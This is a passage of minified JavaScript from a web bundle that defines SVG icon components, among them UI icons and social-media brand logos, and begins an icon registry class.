19.2929L10.2929 17.2929Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M5.29289 12.2929C5.68342 11.9024 6.31643 11.9024 6.70696 12.2929C7.09748 12.6834 7.09748 13.3164 6.70696 13.707L4.70696 15.707C4.31643 16.0975 3.68342 16.0975 3.29289 15.707C2.90237 15.3164 2.90237 14.6834 3.29289 14.2929L5.29289 12.2929Z",fill:"currentColor"}),(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.5002 1.75C21.9145 1.75 22.2502 2.08569 22.2502 2.5V3.10059C22.2502 5.88916 21.0051 8.88525 19.2672 11.1758L19.7473 16.9375C19.7656 17.1575 19.6865 17.3743 19.5305 17.5303L15.5305 21.5303C15.3439 21.717 15.0726 21.792 14.8167 21.7275C14.5609 21.6631 14.3574 21.4685 14.2815 21.2158L12.8049 16.2939L7.7063 11.1953L2.78442 9.71875C2.62842 9.67188 2.49463 9.57642 2.39984 9.4502C2.34113 9.37183 2.29742 9.28149 2.27271 9.18359C2.20819 8.92773 2.28333 8.65649 2.46997 8.46973L6.46997 4.46973L6.53149 4.41504C6.68048 4.29565 6.87042 4.23682 7.06274 4.25293L12.8245 4.73315C15.115 2.99512 18.111 1.75 20.8997 1.75H21.5002ZM19.0002 6.5C19.0002 7.32837 18.3287 8 17.5002 8C16.6718 8 16.0002 7.32837 16.0002 6.5C16.0002 5.67163 16.6718 5 17.5002 5C18.3287 5 19.0002 5.67163 19.0002 6.5Z",fill:"currentColor"})),plugin_connect_socket_integration_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M5.20699 8.79297L6.99995 10.5859L8.79292 8.79297C9.18343 8.40234 9.81642 8.40234 10.207 8.79297C10.5975 9.18335 10.5975 9.81641 10.207 10.207L8.41402 12L12 15.5859L13.7929 13.793C14.1834 13.4023 14.8164 13.4023 15.207 13.793C15.5975 14.1833 15.5975 14.8164 15.207 15.207L13.414 17L15.207 18.793C15.5975 19.1833 15.5975 19.8164 15.207 20.207C14.8164 20.5974 14.1834 20.5974 13.7929 20.207L12.8233 19.2375L10.9445 21.1162C9.87056 22.1902 8.12886 22.1902 7.05489 21.1162L5.67653 19.7375L3.20699 22.207C2.81642 22.5974 2.18343 22.5974 1.79292 22.207C1.40236 21.8164 1.40236 21.1833 1.79292 20.793L4.26265 18.3232L2.88405 16.9443C1.81007 15.8706 1.81007 14.1296 2.88405 13.0557L4.76277 11.177L3.79292 10.207C3.40236 9.81641 3.40236 9.18335 3.79292 8.79297C4.18343 8.40234 4.81642 8.40234 5.20699 8.79297Z",fill:"currentColor"}),(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11.1768 4.7627L10.207 3.79297C9.81641 3.40234 9.18341 3.40234 8.79291 3.79297C8.40234 4.18335 8.40234 4.81641 8.79291 5.20703L18.7929 15.207C19.1834 15.5974 19.8164 15.5974 20.207 15.207C20.5975 14.8164 20.5975 14.1833 20.207 13.793L19.2374 12.8232L21.1161 10.9446C22.1901 9.87061 22.1901 8.12891 21.1161 7.05493L19.7374 5.67651L22.207 3.20703C22.5975 2.81641 22.5975 2.18335 22.207 1.79297C21.8164 1.40234 21.1834 1.40234 20.7929 1.79297L18.3232 4.2627L16.9443 2.88403C15.8703 1.81006 14.1295 1.81006 13.0556 2.88403L11.1768 4.7627Z",fill:"currentColor"})),unlink_link_break_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M2.29286 4.29325C2.68338 3.90273 3.31639 3.90273 3.70692 4.29325L10.9999 11.5862L13.7929 8.79325C14.1834 8.40273 14.8164 8.40273 15.2069 8.79325C15.5972 9.1838 15.5974 9.81687 15.2069 10.2073L12.4139 13.0003L19.7069 20.2933C20.0972 20.6838 20.0974 21.3169 19.7069 21.7073C19.3165 22.0977 18.6834 22.0976 18.2929 21.7073L14.5194 17.9339L12.204 20.2493C9.86964 22.5836 6.08522 22.5835 3.75086 20.2493C1.41651 17.915 1.41657 14.1306 3.75086 11.7962L6.06532 9.47978L2.29286 5.70732C1.90236 5.31682 1.90241 4.68379 2.29286 4.29325ZM5.16493 13.2102C3.61168 14.7636 3.61162 17.2819 5.16493 18.8352C6.71823 20.3884 9.23662 20.3884 10.7899 18.8352L13.1054 16.5198L10.9999 14.4143L10.2069 15.2073C9.81646 15.5977 9.18337 15.5976 8.79286 15.2073C8.40236 14.8168 8.40241 14.1838 8.79286 13.7933L9.58582 13.0003L7.48036 10.8948L5.16493 13.2102Z",fill:"currentColor"}),(0,a.createElement)("path",{d:"M11.7958 3.75126C14.1302 1.4169 17.9145 1.41689 20.2489 3.75126C22.5832 6.08564 22.5833 9.87005 20.2489 12.2044L17.7352 14.719C17.3449 15.1092 16.7117 15.109 16.3212 14.719C15.9307 14.3285 15.9307 13.6945 16.3212 13.304L18.8348 10.7903C20.3881 9.23703 20.3881 6.71866 18.8348 5.16533C17.2815 3.612 14.7632 3.61201 13.2098 5.16533L10.6962 7.679C10.3057 8.06941 9.67164 8.06939 9.28114 7.679C8.89103 7.28851 8.89092 6.65536 9.28114 6.26493L11.7958 3.75126Z",fill:"currentColor"})),unlocked_open_security_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 1C15.3136 1.00007 18 3.68634 18 7V9.25C19.5188 9.25 20.75 10.4812 20.75 12V20C20.75 21.5188 19.5188 22.75 18 22.75H6C4.48122 22.75 3.25 21.5188 3.25 20V12C3.25 10.4812 4.48122 9.25 6 9.25H16V7C16 4.79091 14.2091 3.00007 12 3C10.5207 3.00001 9.22731 3.80281 8.53418 5.00098C8.25756 5.47873 7.6459 5.64163 7.16797 5.36523C6.69018 5.0886 6.52723 4.47697 6.80371 3.99902C7.83968 2.20846 9.77808 1.00001 12 1ZM12 14.5C11.4477 14.5 11 14.9477 11 15.5V16.5C11 17.0523 11.4477 17.5 12 17.5C12.5523 17.5 13 17.0523 13 16.5V15.5C13 14.9477 12.5523 14.5 12 14.5Z",fill:"currentColor"})),sort_ascending_order_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M2.25 5C2.25 3.4812 3.4812 2.25 5 2.25L19 2.25C20.5188 2.25 21.75 3.4812 21.75 5L21.75 19C21.75 20.5188 20.5188 21.75 19 21.75L5 21.75C3.4812 21.75 2.25 20.5188 2.25 19L2.25 5ZM16.75 7.5C16.75 7.08569 16.4142 6.75 16 6.75L6 6.75C5.58581 6.75 5.25 7.08569 5.25 7.5C5.25 7.91431 5.58581 8.25 6 8.25L16 8.25C16.4142 8.25 16.75 7.91431 16.75 7.5ZM11.5 11C11.9142 11 12.25 11.3357 12.25 11.75C12.25 12.1643 11.9142 12.5 11.5 12.5L6 12.5C5.58581 12.5 5.25 12.1643 5.25 11.75C5.25 11.3357 5.58581 11 6 11L11.5 11ZM10.75 16C10.75 15.5857 10.4142 15.25 10 15.25L6 15.25C5.58581 15.25 5.25 15.5857 5.25 16C5.25 16.4143 5.58581 16.75 6 16.75L10 16.75C10.4142 16.75 10.75 16.4143 10.75 16ZM15.25 11C15.25 10.5857 15.5857 10.25 16 10.25C16.4142 10.25 16.75 10.5857 16.75 11L16.75 15.1895L17.9697 13.9697C18.2626 13.6768 18.7373 13.6768 19.0303 13.9697C19.3231 14.2627 19.3231 14.7373 19.0303 15.0303L16.5303 17.5303C16.2373 17.8232 15.7626 17.8232 15.4697 17.5303L12.9697 15.0303C12.6768 14.7373 12.6768 14.2627 12.9697 13.9697C13.2626 13.6768 13.7373 13.6768 14.0303 13.9697L15.25 15.1895L15.25 11Z",fill:"currentColor"})),sort_descending_order_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.75 19C21.75 20.5188 20.5188 21.75 19 21.75H5C3.4812 21.75 2.25 20.5188 2.25 19V5C2.25 3.4812 3.4812 2.25 5 2.25H19C20.5188 2.25 21.75 3.4812 21.75 5V19ZM10.75 8C10.75 8.41431 10.4142 8.75 10 8.75H6C5.58582 8.75 5.25 8.41431 5.25 8C5.25 7.58569 5.58582 7.25 6 7.25H10C10.4142 7.25 10.75 7.58569 10.75 8ZM11.5 13C11.9142 13 12.25 12.6643 12.25 12.25C12.25 11.8357 11.9142 11.5 11.5 11.5H6C5.58582 11.5 5.25 11.8357 5.25 12.25C5.25 12.6643 5.58582 13 6 13H11.5ZM6 15.75H16C16.4142 15.75 16.75 16.0857 16.75 16.5C16.75 16.9143 16.4142 17.25 16 17.25H6C5.58582 17.25 5.25 16.9143 5.25 16.5C5.25 16.0857 5.58582 15.75 6 15.75ZM15.25 13V8.81055L14.0303 10.0303C13.7373 10.3232 13.2626 10.3232 12.9697 10.0303C12.6768 9.73755 12.6768 9.2627 12.9697 8.96973L15.4697 6.46973L15.5264 6.41797C15.8209 6.17773 16.2556 6.19531 16.5303 6.46973L19.0303 8.96973C19.3231 9.2627 19.3231 9.73755 19.0303 10.0303C18.7373 10.3232 18.2626 10.3232 17.9697 10.0303L16.75 8.81055V13C16.75 13.4143 16.4142 13.75 16 13.75C15.5857 13.75 15.25 13.4143 15.25 13Z",fill:"currentColor"})),plus_circle_zoom_in_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 22.75C17.9371 22.75 22.75 17.9371 22.75 12C22.75 6.06294 17.9371 1.25 12 1.25C6.06294 1.25 1.25 6.06294 1.25 12C1.25 17.9371 6.06294 22.75 12 22.75ZM11 16.9999V12.9999H7C6.44771 12.9999 6 12.5522 6 11.9999C6.00006 11.4477 6.44775 10.9999 7 10.9999H11V6.99988C11 6.4476 11.4477 5.99988 12 5.99988C12.5523 5.99988 13 6.4476 13 6.99988V10.9999H17C17.5522 10.9999 17.9999 11.4477 18 11.9999C18 12.5522 17.5523 12.9999 17 12.9999H13V16.9999C13 17.5522 12.5523 17.9999 12 17.9999C11.4477 17.9999 11 17.5522 11 16.9999Z",fill:"currentColor"})),right_circle_solid:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 1.25C6.06294 1.25 1.25 6.06294 1.25 12C1.25 17.9371 6.06294 22.75 12 22.75C17.9371 22.75 22.75 17.9371 22.75 12C22.75 6.06294 17.9371 1.25 12 1.25ZM16.7372 9.67573C17.1103 9.26861 17.0828 8.63604 16.6757 8.26285C16.2686 7.88966 15.636 7.91716 15.2628 8.32428L10.4686 13.5544L8.70711 11.7929C8.31658 11.4024 7.68342 11.4024 7.29289 11.7929C6.90237 12.1834 6.90237 12.8166 7.29289 13.2071L9.79289 15.7071C9.98576 15.9 10.249 16.0057 10.5217 15.9998C10.7944 15.9938 11.0528 15.8768 11.2372 15.6757L16.7372 9.67573Z",fill:"currentColor"}))}},4766:(e,t,n)=>{"use strict";n.d(t,{ZP:()=>s});var a=n(7294),r=n(1900),o=n(4528);(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100 99.964"},(0,a.createElement)("path",{d:"M97.637 61.79a3.8 3.8 0 0 1-.265-2.338c2.854-16.467-1.618-30.679-13.443-42.449A46.289 46.289 0 0 0 57.307 3.971a45.987 45.987 0 0 0-13.429.031 3.88 3.88 0 0 1-2.678-.468 27.868 27.868 0 0 0-37.106 9.469 27.009 27.009 0 0 0-.722 27.349 2.2 2.2 0 0 1 .268 1.577c-4.109 21.989 7.627 42.639 27.735 51.084a48.685 48.685 0 0 0 26.784 3.2 3.168 3.168 0 0 1 2.058.3 28.253 28.253 0 0 0 14.99 3.392 24.78 24.78 0 0 0 10.7-3.344 28.036 28.036 0 0 0 13.784-19.714 26.476 26.476 0 0 0-2.054-15.057Zm-22.9 2.118c-1.145 6.065-5.1 9.919-10.639 12.005a34.579 34.579 0 0 1-25.014.047 17.5 17.5 0 0 1-10.124-9.767 10.7 10.7 0 0 1-.823-3.5 4.786 4.786 0 0 1 2.69-4.8 5.42 5.42 0 0 1 5.954.641 8.434 8.434 0 0 1 1.858 2.609c.575 1.166 1.117 2.344 1.763 3.477a10.145 10.145 0 0 0 8.116 5.239c3.849.439 7.6.181 11.051-1.866 3.034-1.8 4.327-4.8 3.344-7.958a6.789 6.789 0 0 0-3.821-3.96 36.8 36.8 0 0 0-8.484-2.527c-4.659-1.075-9.32-2.134-13.636-4.306-6.146-3.093-8.925-8.983-7.25-15.629a12.974 12.974 0 0 1 5.917-7.83 26.362 26.362 0 0 1 12.494-3.723c1.1-.089 2.212-.11 2.953-.145 5.344.04 10.179.739 14.54 3.347 3.038 1.816 5.483 4.183 6.521 7.712a5.465 5.465 0 0 1-1.221 5.8 5.212 5.212 0 0 1-8.142-.932c-.8-1.185-1.506-2.436-2.312-3.618a9.062 9.062 0 0 0-6.6-4.222c-3.583-.437-7.092-.415-10.344 1.435a5.654 5.654 0 0 0-3.072 3.721c-.446 2.16.408 3.849 2.36 5.136 2.449 1.616 5.253 2.209 8.032 2.887a123.979 123.979 0 0 1 12.525 3.358 19.776 19.776 0 0 1 8.3 4.956c3.252 3.573 3.917 7.862 3.06 12.414Z"})),(0,a.createElement)("svg",{viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M9.34084 11.3521L7.66481 13.0281C6.36891 14.324 4.26783 14.324 2.97193 13.0281C1.67602 11.7322 1.67602 9.63111 2.97193 8.33521L4.64796 6.65918M6.65916 4.64795L8.33519 2.97193C9.63109 1.67603 11.7322 1.67602 13.0281 2.97192C14.324 4.26782 14.324 6.36889 13.0281 7.66479L11.352 9.34082",stroke:"currentColor",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M6.33398 9.66665L9.66732 6.33331",stroke:"currentColor",strokeLinecap:"round"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,a.createElement)("path",{fill:"currentColor",d:"M50 4.4v41.1c0 2.5-2 4.4-4.4 4.4H34.5V31.1c0-.4.1-.6.5-.5h5.4c.4 0 .6 0 .6-.5.3-2.3.6-4.6.9-7 0-.4-.1-.4-.4-.4h-6.6c-.3 0-.5-.1-.5-.4v-4.8c-.1-1.5 1-2.9 2.6-3H41.6c.3 0 .4-.1.4-.4V7.9c0-.4-.1-.4-.5-.4-1.5 0-6.7 0-7.8.2-4 .7-6.9 4-7.2 8.1-.1 2.2 0 4.4 0 6.6 0 .5-.1.6-.6.6h-5.5c-.3 0-.4.1-.4.4v7c0 .3.1.4.4.4h5.5c.5 0 .6.1.6.6v18.8H4.4C2 50 0 48 0 45.5V4.4C0 2 2 0 4.4 0h41.1C48 0 50 2 50 4.4z"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 35.699 50"},(0,a.createElement)("path",{d:"M27.638 5.514A13.716 13.716 0 0 1 26.162 0h-6.835v28.914a6.244 6.244 0 1 1-6.241-6.247 6.086 6.086 0 0 1 1.965.32v-7.002a12.836 12.836 0 0 0-1.965-.149A13.082 13.082 0 1 0 26.16 28.918V14.134a17.847 17.847 0 0 0 10.454 3.277l.162-6.834c-4.405-.105-7.4-1.761-9.14-5.063"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m11.606 21.714a11.347 11.347 0 0 1-6.656-2.086v9.413a8.323 8.323 0 1 1-7.076-8.236v4.461a3.9 3.9 0 0 0-1.251-.2 3.978 3.978 0 1 0 3.974 3.977V10.628h4.353a8.761 8.761 0 0 0 .94 3.514c1.112 2.1 3.015 3.156 5.821 3.223Z"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M30.889 22a8.883 8.883 0 0 1-8.976 8.888A8.932 8.932 0 1 1 30.889 22"}),(0,a.createElement)("path",{d:"M22 0C1.18 0 0 1.179 0 22s1.18 22 22 22 22-1.179 22-22S42.821 0 22 0m0 35.816A13.818 13.818 0 1 1 35.816 22 13.817 13.817 0 0 1 22 35.816m14.362-24.948a3.194 3.194 0 0 1-3.256-3.256 3.248 3.248 0 0 1 3.256-3.256 3.175 3.175 0 0 1 3.168 3.256 3.123 3.123 0 0 1-3.168 3.256"}))),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,a.createElement)("path",{d:"M37.53 0H4.47A4.468 4.468 0 0 0 0 4.47v33.06A4.468 4.468 0 0 0 4.47 42h33.06A4.468 4.468 0 0 0 42 37.53V4.47A4.468 4.468 0 0 0 37.53 0M12.49 35.12c0 .51-.09.59-.59.59H6.87c-.5 0-.59-.17-.59-.59V16.43c0-.5.09-.67.67-.67h5.03c.42 0 .59.08.59.59-.08 6.28-.08 12.49-.08 18.77m-3.1-22.04a3.583 3.583 0 0 1-3.61-3.61 3.626 3.626 0 0 1 3.61-3.6 3.572 3.572 0 0 1 3.6 3.6 3.692 3.692 0 0 1-3.6 3.61m25.65 22.63h-4.78c-.5 0-.75-.08-.75-.67v-9.3a13.485 13.485 0 0 0-.26-2.6 2.664 2.664 0 0 0-2.43-2.35 3.264 3.264 0 0 0-3.69 1.68 6.537 6.537 0 0 0-.58 2.51v9.98c0 .67-.17.84-.84.75-1.59-.08-3.19 0-4.78 0-.42 0-.59-.17-.59-.59V16.35c0-.42.09-.59.51-.59h4.86c.42 0 .5.17.5.5v2.1a7.617 7.617 0 0 1 3.69-2.77 8.813 8.813 0 0 1 6.2.51 5.948 5.948 0 0 1 3.11 4.44 20.4 20.4 0 0 1 .42 3.94v10.56c.08.59-.09.67-.59.67"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44.26"},(0,a.createElement)("path",{d:"M22.311 0A21.555 21.555 0 0 0 .798 21.6a22.259 22.259 0 0 0 3.01 11.067l-3.807 11.6 11.951-3.805A21.656 21.656 0 0 0 44 21.517 21.687 21.687 0 0 0 22.311 0m10.637 29.915a5.156 5.156 0 0 1-3.487 2.414c-4.559.983-9.387-2.593-12.338-5.633a22.894 22.894 0 0 1-5.275-8.046c-.983-2.861.358-8.583 4.381-7.689.984.179 1.163 1.073 1.431 1.878.447 1.162.8 2.235 1.251 3.4a1.514 1.514 0 0 1 0 .894c-.357.805-1.162 1.341-1.7 2.056-.805 1.252 2.324 4.292 3.218 5.1 1.163 1.072 2.951 2.682 4.56 2.861.894.089 2.056-1.7 2.5-2.325.358-.447.626-.536 1.073-.358 1.52.626 2.951 1.52 4.47 2.325a.811.811 0 0 1 .537.983 3.565 3.565 0 0 1-.626 2.146"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0M2.724 24a21.149 21.149 0 0 1 1.844-8.657L14.716 43.15A21.283 21.283 0 0 1 2.724 24M24 45.278a21.317 21.317 0 0 1-6.01-.865l6.384-18.55 6.538 17.917a1.806 1.806 0 0 0 .154.293 21.224 21.224 0 0 1-7.066 1.2m2.931-31.249c1.282-.065 2.436-.2 2.436-.2a.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-2.09 0-5.6-.272-5.6-.272a.88.88 0 0 0-.133 1.754s1.084.136 2.23.2l3.317 9.084-4.657 13.963-7.754-23.047a42.05 42.05 0 0 0 2.436-.2.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-.4 0-.871-.009-1.371-.025a21.273 21.273 0 0 1 32.144-4.006c-.093-.006-.182-.015-.275-.015a3.682 3.682 0 0 0-3.573 3.774c0 1.754 1.01 3.237 2.091 4.991a11.211 11.211 0 0 1 1.754 5.869 24.615 24.615 0 0 1-1.547 7.014l-2.2 6.952Zm7.764 28.366 6.5-18.788a20.025 20.025 0 0 0 1.618-7.62 16.1 16.1 0 0 0-.142-2.189 21.276 21.276 0 0 1-7.974 28.6"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M4 23.999a20 20 0 0 0 11.272 18L5.732 15.86A19.923 19.923 0 0 0 4 24m33.5-1.009a10.531 10.531 0 0 0-1.646-5.517c-1.014-1.648-1.964-3.042-1.964-4.69a3.463 3.463 0 0 1 3.358-3.55c.089 0 .173.011.259.016A20 20 0 0 0 7.29 13.013c.47.015.912.025 1.288.025 2.091 0 5.33-.254 5.33-.254a.827.827 0 0 1 .128 1.648s-1.084.127-2.289.19l7.283 21.664 4.378-13.127-3.117-8.535c-1.078-.063-2.1-.19-2.1-.19a.827.827 0 0 1 .127-1.648s3.3.254 5.267.254c2.092 0 5.331-.254 5.331-.254a.827.827 0 0 1 .128 1.648s-1.085.127-2.289.19l7.228 21.5 2.063-6.538a23.047 23.047 0 0 0 1.454-6.593m-13.146 2.755-6 17.437a20.006 20.006 0 0 0 12.292-.319 1.835 1.835 0 0 1-.143-.276Zm17.2-11.344a15.342 15.342 0 0 1 .134 2.057 18.884 18.884 0 0 1-1.524 7.163l-6.11 17.661a20 20 0 0 0 7.5-26.881"}),(0,a.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m0 46.56A22.56 22.56 0 1 1 46.56 24 22.559 22.559 0 0 1 24 46.56"}))),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 33.86"},(0,a.createElement)("path",{d:"M47.134 5.29a5.893 5.893 0 0 0-4.232-4.232C39.055 0 24.05 0 24.05 0S9.044 0 5.293.962A6.146 6.146 0 0 0 .965 5.29C.003 9.041.003 16.929.003 16.929s0 7.887.962 11.638A5.894 5.894 0 0 0 5.197 32.8c3.847 1.058 18.853 1.058 18.853 1.058s15.005 0 18.756-1.058a6.059 6.059 0 0 0 4.232-4.233C48 24.816 48 16.929 48 16.929s.1-7.888-.866-11.639M19.141 21.928v-10a1.237 1.237 0 0 1 1.845-1.077l8.85 5a1.237 1.237 0 0 1 0 2.153l-8.85 5a1.237 1.237 0 0 1-1.845-1.077"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,a.createElement)("path",{d:"M48.004 23.995a24 24 0 0 1-24 24.005 23.735 23.735 0 0 1-10.948-2.65h.086a15.084 15.084 0 0 0 4.8-6.914 35.685 35.685 0 0 0 1.729-7.009v-.192c.1-.384.192-.384.48-.192.1 0 .1.1.192.1a7.385 7.385 0 0 0 4.322 2.112 11.879 11.879 0 0 0 7.491-.96 16.739 16.739 0 0 0 4.513-3.649 11.277 11.277 0 0 0 1-1.354 17.413 17.413 0 0 0 2.574-7.278 16.381 16.381 0 0 0-1.1-8.555 13.1 13.1 0 0 0-4.774-5.569 17.523 17.523 0 0 0-8.067-2.977A20.935 20.935 0 0 0 15.45 4.065a15.91 15.91 0 0 0-9.028 8.258 11.865 11.865 0 0 0-.288 9.89 8.5 8.5 0 0 0 5.859 4.993c.288.1.384 0 .384-.288.192-1.056.384-2.112.576-3.073 0-.192 0-.384-.192-.48a8.869 8.869 0 0 1-1.825-2.688 6.966 6.966 0 0 1 .1-5.377 12.226 12.226 0 0 1 7.875-7.778 14.92 14.92 0 0 1 7.4-.672c5.475.912 7.914 6.625 7.559 11.685a15.147 15.147 0 0 1-2.757 7.423 7.589 7.589 0 0 1-4.129 2.976 5.108 5.108 0 0 1-4.226-.768 2.864 2.864 0 0 1-1.153-2.3 9.668 9.668 0 0 1 .769-3.745c.48-1.44 1.056-2.785 1.44-4.225a10.787 10.787 0 0 0 .384-3.072 3.408 3.408 0 0 0-4.206-2.977 5.336 5.336 0 0 0-2.641 1.364c-1.892 1.785-2.4 5.175-1.6 7.566a7.772 7.772 0 0 1-.1 4.9c-.864 2.976-1.825 6.049-2.5 9.122a28.284 28.284 0 0 0-.672 7.489 8.268 8.268 0 0 0 .576 3.063 24 24 0 1 1 34.949-21.356"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.85 48"},(0,a.createElement)("path",{d:"M44.492 25.179a6.625 6.625 0 0 0 .192-7.766 6.482 6.482 0 0 0-9.492-1.151c-.192.1-.288.192-.384.1a28.339 28.339 0 0 0-9.684-2.493c-.192 0-.287-.095-.192-.287.288-.959.672-1.822 1.055-2.781a29.239 29.239 0 0 1 3.068-5.657 7.62 7.62 0 0 1 2.017-1.919 2.338 2.338 0 0 1 2.493 0 6.138 6.138 0 0 1 1.246.959c.192.191.192.287.192.575a3.868 3.868 0 0 0 3.26 4.506 3.786 3.786 0 0 0 4.309-3.739 3.8 3.8 0 0 0-5.463-3.547.358.358 0 0 1-.479-.1 4.481 4.481 0 0 0-1.151-.863 5.486 5.486 0 0 0-6.232-.1 14.609 14.609 0 0 0-3.26 3.643 38.376 38.376 0 0 0-4.123 9.013c-.1.287-.192.383-.479.383a26.861 26.861 0 0 0-10.163 2.493c-.192.1-.288.1-.48-.1a6.631 6.631 0 0 0-8.054-.383 6.539 6.539 0 0 0-1.246 9.4c.192.192.192.288.1.479a13.425 13.425 0 0 0-.959 3.74 14.384 14.384 0 0 0 2.3 8.821 20.414 20.414 0 0 0 7.191 6.519 27.739 27.739 0 0 0 12.752 3.069 27.311 27.311 0 0 0 12.464-2.781 19.211 19.211 0 0 0 7.282-5.933c3.068-4.219 3.835-8.725 1.822-13.615a.865.865 0 0 1 .1-.48m-12.656 5.421a3.645 3.645 0 1 1 3.024-3.023 3.646 3.646 0 0 1-3.024 3.023m-.192 8.1a14.556 14.556 0 0 1-9.013 3.26 14.886 14.886 0 0 1-8.533-3.164 1.469 1.469 0 1 1 1.822-2.3 11.081 11.081 0 0 0 7.862 2.493 11.805 11.805 0 0 0 5.369-2.014c.288-.191.479-.383.767-.575a1.488 1.488 0 0 1 2.014.288 1.6 1.6 0 0 1-.288 2.013m-16.683-15.34a3.646 3.646 0 1 1-3.644 3.643 3.526 3.526 0 0 1 3.644-3.643m-12.464.767a4.959 4.959 0 0 1 7.095-6.808 18.573 18.573 0 0 0-7.095 6.808m41.036-.288a18.259 18.259 0 0 0-6.807-6.424c-.1-.1-.192-.1-.288-.192a5.75 5.75 0 0 1 2.4-.959 4.811 4.811 0 0 1 4.794 2.206 4.978 4.978 0 0 1 .1 5.273c0 .1-.1.384-.192.1"})),(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,a.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"}));const i=new class{constructor(){this.icons=new Map,this.aliases=new Map}initializeIcons(e){Object.entries(e).forEach((([e,t])=>{this.icons.set(e,t)}))}storeAliases(e){Object.entries(e).forEach((([e,t])=>{this.icons.has(t)&&this.aliases.set(e,this.icons.get(t))}))}getAliases(){return 